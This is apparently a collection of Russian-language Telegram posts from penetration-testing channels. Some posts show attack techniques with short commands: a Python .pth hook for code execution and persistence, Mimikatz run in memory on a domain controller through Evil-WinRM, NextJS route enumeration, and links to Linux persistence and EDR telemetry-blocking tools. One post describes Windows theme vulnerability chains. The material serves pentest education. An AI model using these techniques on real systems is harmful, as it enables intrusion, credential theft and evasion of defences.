Fsecurity | HH

🔗Ссылка: https://www.securitylab.ru/news/555586.php

🔗Ссылка: https://habr.com/ru/companies/ruvds/articles/648241/

🔗Ссылка: https://www.securitylab.ru/news/555628.php

Скрипт Nmap, который сканирует возможные уязвимости на основе сервисов, обнаруженных в открытых портах. 🔗Ссылка: https://github.com/scmanjarrez/CVEScannerV2

Code execution via Site-Specific Configuration Hooks В статейке нашел очень интересный метод эксплуатации File write to RCE в Python за счет использования функционала site-specific configuration hooks. (Он конечно не новый, но мне показалось очень интересным) Чтобы получить исполнение необходимо: 1. Записать python код начинающийся с import или import\t в ~/.local/lib/pythonX.Y/site-packages/arb_name.pth с расширением .pth

user@host:~$ echo 'import os;os.system("whoami>/tmp/x")' > .local/lib/python3.12/site-packages/arbitrary_name.pth

2. И при пораждении нового процесса питона выполниться код

user@host:~$ python3
>>> CTRL + D
user@host:~$ cat /tmp/x
user

Подробнее P.S. Persistence также возможен, так как код исполняется при каждом запуске питона #web #python #RCE

🖥 Препарируем NextJS #tip #tips #bugbounty #nextjs #vercel Есть небольшой лайфхак, так сказать, который позволяет одномоментно вывести все существующие роуты в NextJS приложении. В Инструментах разработчика > Консоль > allow pasting >

console.log(__BUILD_MANIFEST.sortedPages.join('\n'));

Скрин1 был честно украден из X, т.к. скрины с проекта нельзя показывать, иначе вы слишком быстро поймёте что за компания)) Скрин2, это из моей платформы обучения. Как видите, у меня это уже не работает :)

👩 Работа этой строки очень проста. Берётся __BUILD_MANIFEST, в котором перечисленны все страницы и просто через join их выводим. Работает ли это до сих пор? Да, буквально недавно на одном из проектов попалось это. На главной странице отдавался 404, попытки активно или пассивно профаззить не дали результатов.

Пришлось выйти в интернет с этим вопросом и немного покопаться в документации, чтобы прийти к этой команде. Также ещё по опыту своей разработки и отслеживания как разрабы пишут код, хочу заметить что очень редко отключают console.log, console.error и т.д. на продакшен версиях сайта. А сделать это очень легко:

module.exports = {
  compiler: {
    removeConsole: process.env.NODE_ENV === "production",
  },
};

🐇 Есть ещё классное браузерное расширение Next.js Explorer. У меня о нём спрашивали на Bugs Zone. Вот решил напомнить. Оно позволяет показывать какие данные хранятся в приложении. Иногда может подсветить даже какие-то секреты, если они указаны не в .env

На самом деле NextJS очень дырявый, у него относительно часто появляются CVE. Так что приходится следить ещё и за этим) Кроме обнов каждую наносекунду 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

PANIX - это мощная, модульная и легко настраиваемая платформа сохранения данных Linux, предназначенная для исследователей безопасности, инженеров по обнаружению, тестировщиков на проникновение, энтузиастов CTF и многих других. Созданная с учетом универсальности, PANIX делает упор на функциональность, что делает ее незаменимым инструментом для понимания и внедрения широкого спектра методов сохранения данных. 🔗Ссылка: https://github.com/Aegrah/PANIX

Век живи - век учись... Интересный встроенный функционал #Evil-WinRM узнал недавно изучая очередной «индусский» курс. Суть в то, что у Evil-WinRM есть встроенный тулсет доступный через menu. И есть например - функция Invoke-Mimikatz которая позволяет загружать и выполнять утилиту Mimikatz непосредственно в памяти целевой системы, что снижает вероятность обнаружения антивирусными средствами. А еще, он поддерживает переменные при выполнении команд, и если нам нужно исполнить скрипт или еще что-то не на целевой заовненной системе, а за ее пределами, например на контроллере домена, без необходимости пробрасывания туннельки - мы можем использовать это для выполнения наших команд безтельно (в памяти). На примере ниже - исполнение мимикатза из памяти на контролле домена DC через WinRM сессию с пользовательского хоста

*Evil-WinRM* PS UserHost#> Invoke-Command -computername dc.intranet.poo -scriptblock ${function:Invoke-Mimikatz} -credential $cred

🔗Ссылка: https://opennet.ru/62587/

🔗Ссылка: https://habr.com/ru/companies/f_a_c_c_t/news/874046/

Bug Bounty Recon Series #1: Discover and Map Hidden Endpoints and Parameters https://www.yeswehack.com/learn-bug-bounty/discover-map-hidden-endpoints-parameters 🪳@bugxplorer

🔗Ссылка: https://habr.com/ru/news/874356/

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Используйте законный драйвер вызова WFP для предотвращения отправки телеметрии агентами EDR 🔗Ссылка: https://github.com/senzee1984/EDRPrison

🔗Ссылка: https://habr.com/ru/articles/861616/

😑 Threat Intelligence: зачем это нужно? #threatintelligence #кибербезопасность #TI Threat Intelligence (TI) — это сбор и анализ информации о киберугрозах, который помогает компаниям предугадывать действия злоумышленников и защищаться заранее. Почему это важно? Представьте, что у вас есть данные о том, где, как и когда враг готовится атаковать. TI предоставляет информацию о новых уязвимостях, фишинговых кампаниях, вредоносных программах и тактиках атакующих. Мне эта тема стала интересна давно, причем я на неё смотрю не с точки зрения защиты, а как пентестер. Как это помогает? Для blue team: Позволяет обновлять защиту до того, как станет поздно. Для руководителей: Обучает сотрудников распознавать современные угрозы. Для CISO: Помогает прогнозировать атаки и снижать потенциальные риски. Для пентестеров/багхантеров: Максимально быстро узнавать о 0/1 day эксплойтах. Можно развернуть на своих серверах интересное для себя ПО, к примеру VMware Horizon, 1C Bitrix и анализировать как атакуют такие системы. Threat Intelligence — это не просто аналитика. Это инструмент, который делает вашу защиту проактивной, а не реактивной. По другому это можно сравнить с противостоянием меч и щит. Хакеры всегда затачивают мечи, безопасникам нужно делать щит прочнее. TI позволяет делать щит прочнее, заранее узнав каким мечом тебя ударят. А вы используете TI в своей практике? Делитесь опытом в комментариях) Если вам интересна эта тема, ставьте ❤️ 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

🔗Ссылка: https://opennet.ru/62585/

Хочу поделиться с вами новостью: я столкнулся с проблемой установки DaVinci Resolve на Kali Linux. 😅 Но есть и хорошие новости! Я наконец-то обновил свое оборудование и принял решение полностью перейти на Linux. 💻🐧 Я потратил около 3 ночей, пытаясь заставить работать DaVinci Resolve на моем новом ноутбуке. Наверное, так бы и не нашел решение, если бы не решил обратиться за помощью к нескольким замечательным людям: Лолечка, Банер и v1mkss. Я очень благодарен этим людям за поддержку! Единственное, что только один из них не является участником нашего сервера, а сервера Банера. 🤔 --> https://discord.gg/BRRdKVz2zK (небольшая реклама) 📢 И вот, наконец, я смог запустить DaVinci Resolve! 🥳 Надеюсь, что больше не столкнусь с проблемами. 🤞 Спасибо всем за помощь! 🍷

Windows Theme Spoofing В Windows существуют специальные файлы тем с одноименным расширением .themes. Они позволяют кастомизировать систему, применяя новые раскраски, цветовые палитры, шрифты и обои. В 2023 году вышел POC на уязвимость themebleed (POC2), которая как-то не была оценена по достоинству. Фактически, это был Built-In Loader. Все основывалось на том, что Explorer.exe, обнаруживая в файле темы специальную ссылку на файл стилей (msstyles) , осуществит удаленную загрузку DLL с именем, оканчивающемся на _vrf.dll. Была, конечно, осуществлена проверка подписи, но эту проверку обошли с помощью атаки TOCTOU (Time of Check - Time of Use). При первом обращении на подконтрольный атакующему SMB-сервер происходила передача легитимной библиотеки DLL для осуществления проверок подписи, однако за первым запросом следовал второй (после успешной проверки), на который уже отдавалась вредоносная библиотека. На этом исследования Windows Themes не закончились и обнаружилась новая уязвимость — утечка NetNTLM-хеша без необходимости открытия файла тем. Достаточно было зайти в папку с правильно сгенерированным файлом и хеш был в наших руках. Язве был назначен идентификатор CVE-2024-21320, а POC можно найти тут. Эти две уязвимости могут отлично работать в чейне с Smuggling-техниками. Патч на CVE-2024-21320 заключался во внедрении проверки на UNC путь функцией PathIsUnc() — если путь был на сетевую шару, то Explorer.exe не пытался подгрузить файлы для файла темы. Однако исследователи нашли способ обхода (благодаря статье Google Project Zero), указав UNC Path в ином формате: \??\UNC\ip\share. Так родилась CVE-2024-38030, подробного ее разбора не было, но появился POC. MS чуть исправила функцию и, казалось бы, на этом все, однако, приключения не закончились, и появилась CVE-2025-21308. На нее пока нет ни разбора, ни POCа, но что-то мне подсказывает, что вновь появился способ обхода проверки на UNC путь :)